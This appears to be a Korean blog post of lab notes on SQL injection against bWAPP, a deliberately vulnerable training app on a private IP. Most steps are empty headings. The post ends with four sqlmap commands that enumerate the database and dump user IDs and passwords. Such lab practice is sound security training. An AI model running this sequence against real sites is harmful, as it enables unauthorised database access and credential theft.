Web

SQL인젝션

Bazinga! 2024. 8. 20. 15:17

1.

2.

3.

 

 

4. column 확인

 

table_name = "users"

 

 

5. data 추출

 

 

6. boolean-based

 

 

 

 

 

 

 

 

7. Login form/Hero

 

 

 

 

 

 

8. Login Form/User

 

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" --dbs

 

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp --tables

 

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp -T users --columns

sqlmap -u "http://192.168.213.129/bWAPP/sqli_16.php" --cookie="security_level=0; has_js=1; PHPSESSID=e67786e59e6d0f6469909fe8775fb680" --data "login=aaaa&password=bbbb&form=submit" -D bwapp -T users -C id,password --dump